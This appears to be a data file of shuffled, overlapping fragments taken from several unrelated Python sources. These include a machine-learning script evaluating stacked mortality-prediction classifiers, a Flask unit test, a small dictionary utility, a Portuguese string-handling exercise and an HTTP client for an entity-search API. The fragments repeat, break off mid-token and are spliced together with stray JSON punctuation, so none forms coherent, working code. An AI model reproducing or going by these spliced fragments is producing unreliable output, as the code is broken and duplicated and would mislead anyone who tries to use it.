MODEL (best): ', clfnamelist[i]) get_clf_eval(df_train_label.tolist(), clflist[i].best_estimator_.predict_proba(df_train)[:, 1].tolist()) printtimer(start_time) print('********** Ensemble [KNN +", "RF + ANN + LR] ******************************') print('*****************************************************************************************\\n\\n') get_clf_eval(df_train_label.tolist(), ensemble_model.predict_proba(df_train)[:,1].tolist()) ################# VALIDATION ################# print('*****************************************************************************************')", "print('Loading dataframe, base, and ensemble classifiers') start_time = printtimer(time.time()) set_seeds(123) # READS DF", "XGB + SVM + NB + RF + ANN + LR] ******************************') print('*****************************************************************************************\\n\\n')", "range (0,len(clflist)): print('\\n***** INDIVIDUAL MODEL (best): ', clfnamelist[i]) get_clf_eval(df_train_label.tolist(), clflist[i].best_estimator_.predict_proba(df_train)[:, 1].tolist()) printtimer(start_time) print('**********", "import set_seeds, get_clf_eval, dingdong, printtimer # Written by <NAME>, MD. Dec 2021. #####", "ANN + LR] ******************************') print('*****************************************************************************************\\n\\n') get_clf_eval(df_train_label.tolist(), ensemble_model.predict_proba(df_train)[:,1].tolist()) ################# VALIDATION ################# print('*****************************************************************************************') print(' VALIDATION", "from my_eval_functions import set_seeds, get_clf_eval, dingdong, printtimer # Written by <NAME>, MD. Dec", "and ensemble classifiers') start_time = printtimer(time.time()) set_seeds(123) # READS DF df_final = load('df_final.joblib')", "INDIVIDUAL BASE MODELS (Lv 0) clflist = load('MortalityOutcomeModels.joblib') clfnamelist = load('ClassifierNameList.joblib') # READS", "sklearn.model_selection import * # A custom-made library for reporting from my_eval_functions import set_seeds,", "NB + RF + ANN + LR] ******************************') print('*****************************************************************************************\\n\\n') get_clf_eval(df_train_label.tolist(), ensemble_model.predict_proba(df_train)[:,1].tolist()) ################# VALIDATION", "(best): ', clfnamelist[i]) get_clf_eval(df_train_label.tolist(), clflist[i].best_estimator_.predict_proba(df_train)[:, 1].tolist()) printtimer(start_time) print('********** Ensemble [KNN + XGB +", "Written by <NAME>, MD. Dec 2021. ##### BEGIN print('Loading dataframe, base, and ensemble", "READS INDIVIDUAL BASE MODELS (Lv 0) clflist = load('MortalityOutcomeModels.joblib') clfnamelist = load('ClassifierNameList.joblib') #", "from joblib import dump, load from sklearn.model_selection import * # A custom-made library", "= printtimer(time.time()) set_seeds(123) # READS DF df_final = load('df_final.joblib') df = df_final[0] df_label", "get_clf_eval(df_test_label.tolist(), clflist[i].best_estimator_.predict_proba(df_test)[:, 1].tolist()) printtimer(start_time) print('=========================================================================================') print('********** Ensemble [KNN + XGB + SVM +", "+ ANN + LR] ******************************') print('*****************************************************************************************\\n\\n') get_clf_eval(df_train_label.tolist(), ensemble_model.predict_proba(df_train)[:,1].tolist()) ################# VALIDATION ################# print('*****************************************************************************************') print('", "custom-made library for reporting from my_eval_functions import set_seeds, get_clf_eval, dingdong, printtimer # Written", "### TO STDOUT print('*****************************************************************************************') print(' TRAINING SET\\n') print('=========================================================================================') for i in range (0,len(clflist)):", "+ LR] ******************************') print('*****************************************************************************************\\n\\n') get_clf_eval(df_train_label.tolist(), ensemble_model.predict_proba(df_train)[:,1].tolist()) ################# VALIDATION ################# print('*****************************************************************************************') print(' VALIDATION SET\\n')", "+ XGB + SVM + NB + RF + ANN + LR] ******************************')", "MODEL (Lv 1) ensemble_model = load('EnsembleModel.joblib') ### TO STDOUT print('*****************************************************************************************') print(' TRAINING SET\\n')", "load('MortalityOutcomeModels.joblib') clfnamelist = load('ClassifierNameList.joblib') # READS STACKING ENSEMBLE MODEL (Lv 1) ensemble_model =", "in range (0,len(clflist)): print('\\n***** INDIVIDUAL MODEL (best): ', clfnamelist[i]) get_clf_eval(df_train_label.tolist(), clflist[i].best_estimator_.predict_proba(df_train)[:, 1].tolist()) printtimer(start_time)", "print('=========================================================================================') for i in range (0,len(clflist)): print('\\n***** INDIVIDUAL MODEL (best): ', clfnamelist[i]) get_clf_eval(df_test_label.tolist(),", "df = df_final[0] df_label = df_final[1] df_train, df_test, df_train_label, df_test_label = train_test_split (df,", "df_final[0] df_label = df_final[1] df_train, df_test, df_train_label, df_test_label = train_test_split (df, df_label, test_size=0.3,", "by <NAME>, MD. Dec 2021. ##### BEGIN print('Loading dataframe, base, and ensemble classifiers')", "INDIVIDUAL MODEL (best): ', clfnamelist[i]) get_clf_eval(df_test_label.tolist(), clflist[i].best_estimator_.predict_proba(df_test)[:, 1].tolist()) printtimer(start_time) print('=========================================================================================') print('********** Ensemble [KNN", "+ SVM + NB + RF + ANN + LR] ******************************') print('*****************************************************************************************\\n\\n') get_clf_eval(df_train_label.tolist(),", "classifiers') start_time = printtimer(time.time()) set_seeds(123) # READS DF df_final = load('df_final.joblib') df =", "[KNN + XGB + SVM + NB + RF + ANN + LR]", "plt from joblib import dump, load from sklearn.model_selection import * # A custom-made", "NB + RF + ANN + LR] ******************************') print('*****************************************************************************************\\n\\n') get_clf_eval(df_test_label.tolist(), ensemble_model.predict_proba(df_test)[:,1].tolist()) printtimer(start_time) dingdong()", "df_final = load('df_final.joblib') df = df_final[0] df_label = df_final[1] df_train, df_test, df_train_label, df_test_label", "print('********** Ensemble [KNN + XGB + SVM + NB + RF + ANN", "load('ClassifierNameList.joblib') # READS STACKING ENSEMBLE MODEL (Lv 1) ensemble_model = load('EnsembleModel.joblib') ### TO", "df_label = df_final[1] df_train, df_test, df_train_label, df_test_label = train_test_split (df, df_label, test_size=0.3, random_state=123)", "clfnamelist[i]) get_clf_eval(df_train_label.tolist(), clflist[i].best_estimator_.predict_proba(df_train)[:, 1].tolist()) printtimer(start_time) print('********** Ensemble [KNN + XGB + SVM +", "(Lv 1) ensemble_model = load('EnsembleModel.joblib') ### TO STDOUT print('*****************************************************************************************') print(' TRAINING SET\\n') print('=========================================================================================')", "(0,len(clflist)): print('\\n***** INDIVIDUAL MODEL (best): ', clfnamelist[i]) get_clf_eval(df_test_label.tolist(), clflist[i].best_estimator_.predict_proba(df_test)[:, 1].tolist()) printtimer(start_time) print('=========================================================================================') print('**********", "load from sklearn.model_selection import * # A custom-made library for reporting from my_eval_functions", "1].tolist()) printtimer(start_time) print('********** Ensemble [KNN + XGB + SVM + NB + RF", "ensemble_model.predict_proba(df_train)[:,1].tolist()) ################# VALIDATION ################# print('*****************************************************************************************') print(' VALIDATION SET\\n') print('=========================================================================================') for i in range", "ensemble classifiers') start_time = printtimer(time.time()) set_seeds(123) # READS DF df_final = load('df_final.joblib') df", "dingdong, printtimer # Written by <NAME>, MD. Dec 2021. ##### BEGIN print('Loading dataframe,", "################# print('*****************************************************************************************') print(' VALIDATION SET\\n') print('=========================================================================================') for i in range (0,len(clflist)): print('\\n***** INDIVIDUAL", "# READS STACKING ENSEMBLE MODEL (Lv 1) ensemble_model = load('EnsembleModel.joblib') ### TO STDOUT", "import dump, load from sklearn.model_selection import * # A custom-made library for reporting", "random_state=123) # READS INDIVIDUAL BASE MODELS (Lv 0) clflist = load('MortalityOutcomeModels.joblib') clfnamelist =", "print('*****************************************************************************************\\n\\n') get_clf_eval(df_train_label.tolist(), ensemble_model.predict_proba(df_train)[:,1].tolist()) ################# VALIDATION ################# print('*****************************************************************************************') print(' VALIDATION SET\\n') print('=========================================================================================') for i", "# Written by <NAME>, MD. Dec 2021. ##### BEGIN print('Loading dataframe, base, and", "df_train_label, df_test_label = train_test_split (df, df_label, test_size=0.3, random_state=123) # READS INDIVIDUAL BASE MODELS", "################# VALIDATION ################# print('*****************************************************************************************') print(' VALIDATION SET\\n') print('=========================================================================================') for i in range (0,len(clflist)):", "for reporting from my_eval_functions import set_seeds, get_clf_eval, dingdong, printtimer # Written by <NAME>,", "MD. Dec 2021. ##### BEGIN print('Loading dataframe, base, and ensemble classifiers') start_time =", "= df_final[0] df_label = df_final[1] df_train, df_test, df_train_label, df_test_label = train_test_split (df, df_label,", "STACKING ENSEMBLE MODEL (Lv 1) ensemble_model = load('EnsembleModel.joblib') ### TO STDOUT print('*****************************************************************************************') print('", "A custom-made library for reporting from my_eval_functions import set_seeds, get_clf_eval, dingdong, printtimer #", "set_seeds, get_clf_eval, dingdong, printtimer # Written by <NAME>, MD. Dec 2021. ##### BEGIN", "base, and ensemble classifiers') start_time = printtimer(time.time()) set_seeds(123) # READS DF df_final =", "STDOUT print('*****************************************************************************************') print(' TRAINING SET\\n') print('=========================================================================================') for i in range (0,len(clflist)): print('\\n***** INDIVIDUAL", "VALIDATION ################# print('*****************************************************************************************') print(' VALIDATION SET\\n') print('=========================================================================================') for i in range (0,len(clflist)): print('\\n*****", "= train_test_split (df, df_label, test_size=0.3, random_state=123) # READS INDIVIDUAL BASE MODELS (Lv 0)", "clflist[i].best_estimator_.predict_proba(df_train)[:, 1].tolist()) printtimer(start_time) print('********** Ensemble [KNN + XGB + SVM + NB +", "df_train, df_test, df_train_label, df_test_label = train_test_split (df, df_label, test_size=0.3, random_state=123) # READS INDIVIDUAL", "df_final[1] df_train, df_test, df_train_label, df_test_label = train_test_split (df, df_label, test_size=0.3, random_state=123) # READS", "test_size=0.3, random_state=123) # READS INDIVIDUAL BASE MODELS (Lv 0) clflist = load('MortalityOutcomeModels.joblib') clfnamelist", "BASE MODELS (Lv 0) clflist = load('MortalityOutcomeModels.joblib') clfnamelist = load('ClassifierNameList.joblib') # READS STACKING", "(best): ', clfnamelist[i]) get_clf_eval(df_test_label.tolist(), clflist[i].best_estimator_.predict_proba(df_test)[:, 1].tolist()) printtimer(start_time) print('=========================================================================================') print('********** Ensemble [KNN + XGB", "range (0,len(clflist)): print('\\n***** INDIVIDUAL MODEL (best): ', clfnamelist[i]) get_clf_eval(df_test_label.tolist(), clflist[i].best_estimator_.predict_proba(df_test)[:, 1].tolist()) printtimer(start_time) print('=========================================================================================')", "df_test, df_train_label, df_test_label = train_test_split (df, df_label, test_size=0.3, random_state=123) # READS INDIVIDUAL BASE" ]
[ "from typing import Dict def add_prefix_to_keys(data: Dict, prefix: str) -> Dict: keys =", "str) -> Dict: keys = [*data.keys()] for key in keys: data[f\"{prefix}_{key}\"] = data.pop(key)", "Dict def add_prefix_to_keys(data: Dict, prefix: str) -> Dict: keys = [*data.keys()] for key", "add_prefix_to_keys(data: Dict, prefix: str) -> Dict: keys = [*data.keys()] for key in keys:", "typing import Dict def add_prefix_to_keys(data: Dict, prefix: str) -> Dict: keys = [*data.keys()]", "<filename>src/utils.py from typing import Dict def add_prefix_to_keys(data: Dict, prefix: str) -> Dict: keys", "Dict, prefix: str) -> Dict: keys = [*data.keys()] for key in keys: data[f\"{prefix}_{key}\"]", "prefix: str) -> Dict: keys = [*data.keys()] for key in keys: data[f\"{prefix}_{key}\"] =", "-> Dict: keys = [*data.keys()] for key in keys: data[f\"{prefix}_{key}\"] = data.pop(key) return", "def add_prefix_to_keys(data: Dict, prefix: str) -> Dict: keys = [*data.keys()] for key in", "import Dict def add_prefix_to_keys(data: Dict, prefix: str) -> Dict: keys = [*data.keys()] for", "Dict: keys = [*data.keys()] for key in keys: data[f\"{prefix}_{key}\"] = data.pop(key) return data" ]
[ "import TestCase from unit_tests.utilities import Utilities from maintain_frontend import main from maintain_frontend.dependencies.session_api.session import", "test_create_llc1(self): self.client.set_cookie('localhost', Session.session_cookie_name, 'cookie_value') self.mock_session.return_value.user.permissions = [Permissions.request_llc1] response = self.client.get(url_for(\"create_llc1.create_llc1\")) self.assert_status(response, 302) self.assertRedirects(response,", "flask import url_for class TestCreateLLC1(TestCase): def create_app(self): main.app.testing = True Utilities.mock_session_cookie_flask_test(self) return main.app", "create_app(self): main.app.testing = True Utilities.mock_session_cookie_flask_test(self) return main.app def test_create_llc1(self): self.client.set_cookie('localhost', Session.session_cookie_name, 'cookie_value') self.mock_session.return_value.user.permissions", "main.app def test_create_llc1(self): self.client.set_cookie('localhost', Session.session_cookie_name, 'cookie_value') self.mock_session.return_value.user.permissions = [Permissions.request_llc1] response = self.client.get(url_for(\"create_llc1.create_llc1\")) self.assert_status(response,", "TestCase from unit_tests.utilities import Utilities from maintain_frontend import main from maintain_frontend.dependencies.session_api.session import Session", "maintain_frontend import main from maintain_frontend.dependencies.session_api.session import Session from maintain_frontend.constants.permissions import Permissions from flask", "from maintain_frontend.dependencies.session_api.session import Session from maintain_frontend.constants.permissions import Permissions from flask import url_for class", "= True Utilities.mock_session_cookie_flask_test(self) return main.app def test_create_llc1(self): self.client.set_cookie('localhost', Session.session_cookie_name, 'cookie_value') self.mock_session.return_value.user.permissions = [Permissions.request_llc1]", "True Utilities.mock_session_cookie_flask_test(self) return main.app def test_create_llc1(self): self.client.set_cookie('localhost', Session.session_cookie_name, 'cookie_value') self.mock_session.return_value.user.permissions = [Permissions.request_llc1] response", "self.client.set_cookie('localhost', Session.session_cookie_name, 'cookie_value') self.mock_session.return_value.user.permissions = [Permissions.request_llc1] response = self.client.get(url_for(\"create_llc1.create_llc1\")) self.assert_status(response, 302) self.assertRedirects(response, url_for(\"create_llc1.llc1_get_location\"))", "return main.app def test_create_llc1(self): self.client.set_cookie('localhost', Session.session_cookie_name, 'cookie_value') self.mock_session.return_value.user.permissions = [Permissions.request_llc1] response = self.client.get(url_for(\"create_llc1.create_llc1\"))", "<filename>unit_tests/LLC1/test_create_llc1.py<gh_stars>1-10 from flask_testing import TestCase from unit_tests.utilities import Utilities from maintain_frontend import main", "Utilities.mock_session_cookie_flask_test(self) return main.app def test_create_llc1(self): self.client.set_cookie('localhost', Session.session_cookie_name, 'cookie_value') self.mock_session.return_value.user.permissions = [Permissions.request_llc1] response =", "import main from maintain_frontend.dependencies.session_api.session import Session from maintain_frontend.constants.permissions import Permissions from flask import", "from flask import url_for class TestCreateLLC1(TestCase): def create_app(self): main.app.testing = True Utilities.mock_session_cookie_flask_test(self) return", "import url_for class TestCreateLLC1(TestCase): def create_app(self): main.app.testing = True Utilities.mock_session_cookie_flask_test(self) return main.app def", "maintain_frontend.constants.permissions import Permissions from flask import url_for class TestCreateLLC1(TestCase): def create_app(self): main.app.testing =", "flask_testing import TestCase from unit_tests.utilities import Utilities from maintain_frontend import main from maintain_frontend.dependencies.session_api.session", "TestCreateLLC1(TestCase): def create_app(self): main.app.testing = True Utilities.mock_session_cookie_flask_test(self) return main.app def test_create_llc1(self): self.client.set_cookie('localhost', Session.session_cookie_name,", "from maintain_frontend.constants.permissions import Permissions from flask import url_for class TestCreateLLC1(TestCase): def create_app(self): main.app.testing", "Utilities from maintain_frontend import main from maintain_frontend.dependencies.session_api.session import Session from maintain_frontend.constants.permissions import Permissions", "maintain_frontend.dependencies.session_api.session import Session from maintain_frontend.constants.permissions import Permissions from flask import url_for class TestCreateLLC1(TestCase):", "unit_tests.utilities import Utilities from maintain_frontend import main from maintain_frontend.dependencies.session_api.session import Session from maintain_frontend.constants.permissions", "Permissions from flask import url_for class TestCreateLLC1(TestCase): def create_app(self): main.app.testing = True Utilities.mock_session_cookie_flask_test(self)", "from maintain_frontend import main from maintain_frontend.dependencies.session_api.session import Session from maintain_frontend.constants.permissions import Permissions from", "Session.session_cookie_name, 'cookie_value') self.mock_session.return_value.user.permissions = [Permissions.request_llc1] response = self.client.get(url_for(\"create_llc1.create_llc1\")) self.assert_status(response, 302) self.assertRedirects(response, url_for(\"create_llc1.llc1_get_location\")) self.mock_session.return_value.commit.assert_called()", "Session from maintain_frontend.constants.permissions import Permissions from flask import url_for class TestCreateLLC1(TestCase): def create_app(self):", "def create_app(self): main.app.testing = True Utilities.mock_session_cookie_flask_test(self) return main.app def test_create_llc1(self): self.client.set_cookie('localhost', Session.session_cookie_name, 'cookie_value')", "from flask_testing import TestCase from unit_tests.utilities import Utilities from maintain_frontend import main from", "import Permissions from flask import url_for class TestCreateLLC1(TestCase): def create_app(self): main.app.testing = True", "import Utilities from maintain_frontend import main from maintain_frontend.dependencies.session_api.session import Session from maintain_frontend.constants.permissions import", "main.app.testing = True Utilities.mock_session_cookie_flask_test(self) return main.app def test_create_llc1(self): self.client.set_cookie('localhost', Session.session_cookie_name, 'cookie_value') self.mock_session.return_value.user.permissions =", "import Session from maintain_frontend.constants.permissions import Permissions from flask import url_for class TestCreateLLC1(TestCase): def", "url_for class TestCreateLLC1(TestCase): def create_app(self): main.app.testing = True Utilities.mock_session_cookie_flask_test(self) return main.app def test_create_llc1(self):", "main from maintain_frontend.dependencies.session_api.session import Session from maintain_frontend.constants.permissions import Permissions from flask import url_for", "def test_create_llc1(self): self.client.set_cookie('localhost', Session.session_cookie_name, 'cookie_value') self.mock_session.return_value.user.permissions = [Permissions.request_llc1] response = self.client.get(url_for(\"create_llc1.create_llc1\")) self.assert_status(response, 302)", "from unit_tests.utilities import Utilities from maintain_frontend import main from maintain_frontend.dependencies.session_api.session import Session from", "class TestCreateLLC1(TestCase): def create_app(self): main.app.testing = True Utilities.mock_session_cookie_flask_test(self) return main.app def test_create_llc1(self): self.client.set_cookie('localhost'," ]
[ "# print(\"Seu primeiro tem {} letras\".format(nome.find(\" \"))) separa = nome.split() print(\"Meu primeiro nome", "\")).strip() #Valor da variável em letras maiúscula. print(\"Maiúscula:\", nome.upper(), \"\\033[1;32m<--\\033[m\") #Valor da variável", "em letras minúsculas. print(\"Minúscula:\", nome.lower(), \"\\033[1;32m<--\\033[m\") #Contando quantas letras tem o valor da", "nome.find(\" \")) # print(\"Seu primeiro tem {} letras\".format(nome.find(\" \"))) separa = nome.split() print(\"Meu", "nome.lower(), \"\\033[1;32m<--\\033[m\") #Contando quantas letras tem o valor da várialvel nome sem espaços.", "da variável em letras maiúscula. print(\"Maiúscula:\", nome.upper(), \"\\033[1;32m<--\\033[m\") #Valor da variável em letras", "\"\\033[1;32m<--\\033[m\") #Contando quantas letras tem o valor da várialvel nome sem espaços. print(\"Meu", "letras maiúscula. print(\"Maiúscula:\", nome.upper(), \"\\033[1;32m<--\\033[m\") #Valor da variável em letras minúsculas. print(\"Minúscula:\", nome.lower(),", "nome.upper(), \"\\033[1;32m<--\\033[m\") #Valor da variável em letras minúsculas. print(\"Minúscula:\", nome.lower(), \"\\033[1;32m<--\\033[m\") #Contando quantas", "da várialvel nome sem espaços. print(\"Meu nome tem:\", len(nome)-nome.count(\" \"), \"\\033[1;32m<--\\033[m\") # print(\"Meu", "print(\"Minúscula:\", nome.lower(), \"\\033[1;32m<--\\033[m\") #Contando quantas letras tem o valor da várialvel nome sem", "letras tem o valor da várialvel nome sem espaços. print(\"Meu nome tem:\", len(nome)-nome.count(\"", "print(\"Maiúscula:\", nome.upper(), \"\\033[1;32m<--\\033[m\") #Valor da variável em letras minúsculas. print(\"Minúscula:\", nome.lower(), \"\\033[1;32m<--\\033[m\") #Contando", "print(\"Meu primeiro nome tem:\", nome.find(\" \")) # print(\"Seu primeiro tem {} letras\".format(nome.find(\" \")))", "primeiro tem {} letras\".format(nome.find(\" \"))) separa = nome.split() print(\"Meu primeiro nome tem:\", len(separa[0]),", "maiúscula. print(\"Maiúscula:\", nome.upper(), \"\\033[1;32m<--\\033[m\") #Valor da variável em letras minúsculas. print(\"Minúscula:\", nome.lower(), \"\\033[1;32m<--\\033[m\")", "tem:\", len(nome)-nome.count(\" \"), \"\\033[1;32m<--\\033[m\") # print(\"Meu primeiro nome tem:\", nome.find(\" \")) # print(\"Seu", "\"\\033[1;32m<--\\033[m\") #Valor da variável em letras minúsculas. print(\"Minúscula:\", nome.lower(), \"\\033[1;32m<--\\033[m\") #Contando quantas letras", "nome = str(input(\"Seu nome: \")).strip() #Valor da variável em letras maiúscula. print(\"Maiúscula:\", nome.upper(),", "da variável sem espaços no ínicio e fim. nome = str(input(\"Seu nome: \")).strip()", "valor da várialvel nome sem espaços. print(\"Meu nome tem:\", len(nome)-nome.count(\" \"), \"\\033[1;32m<--\\033[m\") #", "\"\\033[1;32m<--\\033[m\") # print(\"Meu primeiro nome tem:\", nome.find(\" \")) # print(\"Seu primeiro tem {}", "o valor da várialvel nome sem espaços. print(\"Meu nome tem:\", len(nome)-nome.count(\" \"), \"\\033[1;32m<--\\033[m\")", "= str(input(\"Seu nome: \")).strip() #Valor da variável em letras maiúscula. print(\"Maiúscula:\", nome.upper(), \"\\033[1;32m<--\\033[m\")", "print(\"Meu nome tem:\", len(nome)-nome.count(\" \"), \"\\033[1;32m<--\\033[m\") # print(\"Meu primeiro nome tem:\", nome.find(\" \"))", "tem o valor da várialvel nome sem espaços. print(\"Meu nome tem:\", len(nome)-nome.count(\" \"),", "nome tem:\", nome.find(\" \")) # print(\"Seu primeiro tem {} letras\".format(nome.find(\" \"))) separa =", "minúsculas. print(\"Minúscula:\", nome.lower(), \"\\033[1;32m<--\\033[m\") #Contando quantas letras tem o valor da várialvel nome", "variável em letras minúsculas. print(\"Minúscula:\", nome.lower(), \"\\033[1;32m<--\\033[m\") #Contando quantas letras tem o valor", "no ínicio e fim. nome = str(input(\"Seu nome: \")).strip() #Valor da variável em", "várialvel nome sem espaços. print(\"Meu nome tem:\", len(nome)-nome.count(\" \"), \"\\033[1;32m<--\\033[m\") # print(\"Meu primeiro", "sem espaços no ínicio e fim. nome = str(input(\"Seu nome: \")).strip() #Valor da", "letras minúsculas. print(\"Minúscula:\", nome.lower(), \"\\033[1;32m<--\\033[m\") #Contando quantas letras tem o valor da várialvel", "sem espaços. print(\"Meu nome tem:\", len(nome)-nome.count(\" \"), \"\\033[1;32m<--\\033[m\") # print(\"Meu primeiro nome tem:\",", "quantas letras tem o valor da várialvel nome sem espaços. print(\"Meu nome tem:\",", "<gh_stars>0 #Valor da variável sem espaços no ínicio e fim. nome = str(input(\"Seu", "fim. nome = str(input(\"Seu nome: \")).strip() #Valor da variável em letras maiúscula. print(\"Maiúscula:\",", "ínicio e fim. nome = str(input(\"Seu nome: \")).strip() #Valor da variável em letras", "#Valor da variável em letras maiúscula. print(\"Maiúscula:\", nome.upper(), \"\\033[1;32m<--\\033[m\") #Valor da variável em", "da variável em letras minúsculas. print(\"Minúscula:\", nome.lower(), \"\\033[1;32m<--\\033[m\") #Contando quantas letras tem o", "espaços. print(\"Meu nome tem:\", len(nome)-nome.count(\" \"), \"\\033[1;32m<--\\033[m\") # print(\"Meu primeiro nome tem:\", nome.find(\"", "variável sem espaços no ínicio e fim. nome = str(input(\"Seu nome: \")).strip() #Valor", "\"), \"\\033[1;32m<--\\033[m\") # print(\"Meu primeiro nome tem:\", nome.find(\" \")) # print(\"Seu primeiro tem", "tem {} letras\".format(nome.find(\" \"))) separa = nome.split() print(\"Meu primeiro nome tem:\", len(separa[0]), \"\\033[1;32m<--\\033[m\")", "tem:\", nome.find(\" \")) # print(\"Seu primeiro tem {} letras\".format(nome.find(\" \"))) separa = nome.split()", "#Valor da variável sem espaços no ínicio e fim. nome = str(input(\"Seu nome:", "str(input(\"Seu nome: \")).strip() #Valor da variável em letras maiúscula. print(\"Maiúscula:\", nome.upper(), \"\\033[1;32m<--\\033[m\") #Valor", "variável em letras maiúscula. print(\"Maiúscula:\", nome.upper(), \"\\033[1;32m<--\\033[m\") #Valor da variável em letras minúsculas.", "len(nome)-nome.count(\" \"), \"\\033[1;32m<--\\033[m\") # print(\"Meu primeiro nome tem:\", nome.find(\" \")) # print(\"Seu primeiro", "e fim. nome = str(input(\"Seu nome: \")).strip() #Valor da variável em letras maiúscula.", "nome sem espaços. print(\"Meu nome tem:\", len(nome)-nome.count(\" \"), \"\\033[1;32m<--\\033[m\") # print(\"Meu primeiro nome", "espaços no ínicio e fim. nome = str(input(\"Seu nome: \")).strip() #Valor da variável", "\")) # print(\"Seu primeiro tem {} letras\".format(nome.find(\" \"))) separa = nome.split() print(\"Meu primeiro", "# print(\"Meu primeiro nome tem:\", nome.find(\" \")) # print(\"Seu primeiro tem {} letras\".format(nome.find(\"", "#Valor da variável em letras minúsculas. print(\"Minúscula:\", nome.lower(), \"\\033[1;32m<--\\033[m\") #Contando quantas letras tem", "nome tem:\", len(nome)-nome.count(\" \"), \"\\033[1;32m<--\\033[m\") # print(\"Meu primeiro nome tem:\", nome.find(\" \")) #", "nome: \")).strip() #Valor da variável em letras maiúscula. print(\"Maiúscula:\", nome.upper(), \"\\033[1;32m<--\\033[m\") #Valor da", "#Contando quantas letras tem o valor da várialvel nome sem espaços. print(\"Meu nome", "print(\"Seu primeiro tem {} letras\".format(nome.find(\" \"))) separa = nome.split() print(\"Meu primeiro nome tem:\",", "primeiro nome tem:\", nome.find(\" \")) # print(\"Seu primeiro tem {} letras\".format(nome.find(\" \"))) separa", "em letras maiúscula. print(\"Maiúscula:\", nome.upper(), \"\\033[1;32m<--\\033[m\") #Valor da variável em letras minúsculas. print(\"Minúscula:\"," ]
[ "'json' lq = copy.deepcopy(q) lq['limit'] = pagesize r = self.query('POST','entity/search',lq,opts) hits = []", "KIND, either express or implied. # See the License for the specific language", "Unless required by applicable law or agreed to in writing, software # distributed", "__init__(self,host='127.0.0.0',port=8000,verbose=False): self.headers={} self.host=host self.port=port self.verbose=verbose self.errors = [] self.connect() def connect(self): try: self.conn=httplib2.Http()", "return cont if not opts.has_key(\"format\") or opts[\"format\"] == \"json\": j=json.loads(cont) return j elif", "len(args) == 3: httpmode, command, q, opts = 'GET', args[0], args[1], args[2] uq=urllib.urlencode({\"q\":json.dumps(q)})", "== 4: httpmode, command, q, opts = args[0:4] elif len(args) == 3: httpmode,", "MODE:\",httpmode return None if self.verbose: print \"REQUEST URL =\",url if resp.status==200: if not", "this file except in compliance with the License. # You may obtain a", "try: self.conn=httplib2.Http() except: self.errors.append(\"Failed to connect to server at host %s port %s.\"", "\"DECODED CURSOR:\",json.dumps(parse_cursor(r['cursor']),indent=4,sort_keys=True) lq = {\"cursor\":r['cursor'],\"limit\":pagesize} r = self.query('POST','entity/search',lq,opts) if r.get('response'): hits.extend(r['response']) print \"TOTAL", "\",i h.add(i) #print \"TOTAL SET:\",json.dumps(sorted(list(h)),indent=4) if __name__=='__main__': h,p = sys.argv[1].split(\":\") c=client(host=h,port=int(p)) q =", "return hits def find_dupes(l): h = set() for hit in l: i =", "print \"REQUEST URL =\",url if resp.status==200: if not parse: return cont if not", "kwargs['parse'] if len(args) == 4: httpmode, command, q, opts = args[0:4] elif len(args)", "ANY KIND, either express or implied. # See the License for the specific", "find_dupes(hits) return hits def find_dupes(l): h = set() for hit in l: i", "__name__=='__main__': h,p = sys.argv[1].split(\":\") c=client(host=h,port=int(p)) q = json.loads(sys.argv[2]) print \"QUERY:\\n\",json.dumps(q,indent=4,sort_keys=True) if len(sys.argv) >", "= self.query('POST','entity/search',lq,opts) if r.get('response'): hits.extend(r['response']) print \"TOTAL HITS:\",len(hits) find_dupes(hits) return hits def find_dupes(l):", "return None def search_iter(self,q,opts={},pagesize=10): opts['format'] = 'json' lq = copy.deepcopy(q) lq['limit'] = pagesize", "WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See", "entity/search '{\"urn:lri:property_type:types\":\"urn:lri:entity_type:type\"}' '{\"details\":true}' ./client.py GET entity/create '{\"urn:lri:property_type:id\":\"MY_FQGUID\",\"urn:lri:property_type:types\":[\"urn:lri:entity_type:thing\"]}' ./client.py GET property/create '{\"from\":\"MY_ENTITY_GUID\",\"urn:lri:property_type:name\":\"THE NAME OF", "= sys.argv[3] else: pagesize,pagesize = 10 response = c.search_iter(q,pagesize=pagesize) print json.dumps(response,indent=4,sort_keys=True) \"\"\" Usage", "if r.get('response'): hits.extend(r['response']) print \"TOTAL HITS:\",len(hits) find_dupes(hits) return hits def find_dupes(l): h =", "print \"DUPLICATE! \",i h.add(i) #print \"TOTAL SET:\",json.dumps(sorted(list(h)),indent=4) if __name__=='__main__': h,p = sys.argv[1].split(\":\") c=client(host=h,port=int(p))", "IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or", "print json.dumps(response,indent=4,sort_keys=True) \"\"\" Usage examples:\\n ./client.py GET entity/search '{\"urn:lri:property_type:types\":\"urn:lri:entity_type:type\"}' '{\"details\":true}' ./client.py GET entity/create", "OF ANY KIND, either express or implied. # See the License for the", "h: print \"DUPLICATE! \",i h.add(i) #print \"TOTAL SET:\",json.dumps(sorted(list(h)),indent=4) if __name__=='__main__': h,p = sys.argv[1].split(\":\")", "if opts[\"format\"] == \"yaml\": return yaml.safe_load(cont) elif opts[\"format\"] in [\"xml\",\"oldxml\",\"johnxml\"]: return cont else:", "# Copyright 2012-2013 inBloom, Inc. and its affiliates. # # Licensed under the", "q, opts = args[0:4] elif len(args) == 3: httpmode, command, q, opts =", "language governing permissions and # limitations under the License. import json,sys,httplib2,urllib,yaml,traceback,copy,base64,zlib def parse_cursor(s):", "#print \"TOTAL SET:\",json.dumps(sorted(list(h)),indent=4) if __name__=='__main__': h,p = sys.argv[1].split(\":\") c=client(host=h,port=int(p)) q = json.loads(sys.argv[2]) print", "command, q, opts = args[0:4] elif len(args) == 3: httpmode, command, q, opts", "pagesize = sys.argv[3] else: pagesize,pagesize = 10 response = c.search_iter(q,pagesize=pagesize) print json.dumps(response,indent=4,sort_keys=True) \"\"\"", "json,sys,httplib2,urllib,yaml,traceback,copy,base64,zlib def parse_cursor(s): return(json.loads(zlib.decompress(base64.urlsafe_b64decode(s.encode('utf-8'))))) class client(object): def __init__(self,host='127.0.0.0',port=8000,verbose=False): self.headers={} self.host=host self.port=port self.verbose=verbose self.errors", "def find_dupes(l): h = set() for hit in l: i = hit['props']['urn:lri:property_type:guid'] if", "[] if r.get('response'): hits.extend(r['response']) find_dupes(hits) while r.get('cursor'): #print \"ITER CURSOR:\",r['cursor'][0:60] #print \"DECODED CURSOR:\",json.dumps(parse_cursor(r['cursor']),indent=4,sort_keys=True)", "\"DUPLICATE! \",i h.add(i) #print \"TOTAL SET:\",json.dumps(sorted(list(h)),indent=4) if __name__=='__main__': h,p = sys.argv[1].split(\":\") c=client(host=h,port=int(p)) q", "self.connect() def connect(self): try: self.conn=httplib2.Http() except: 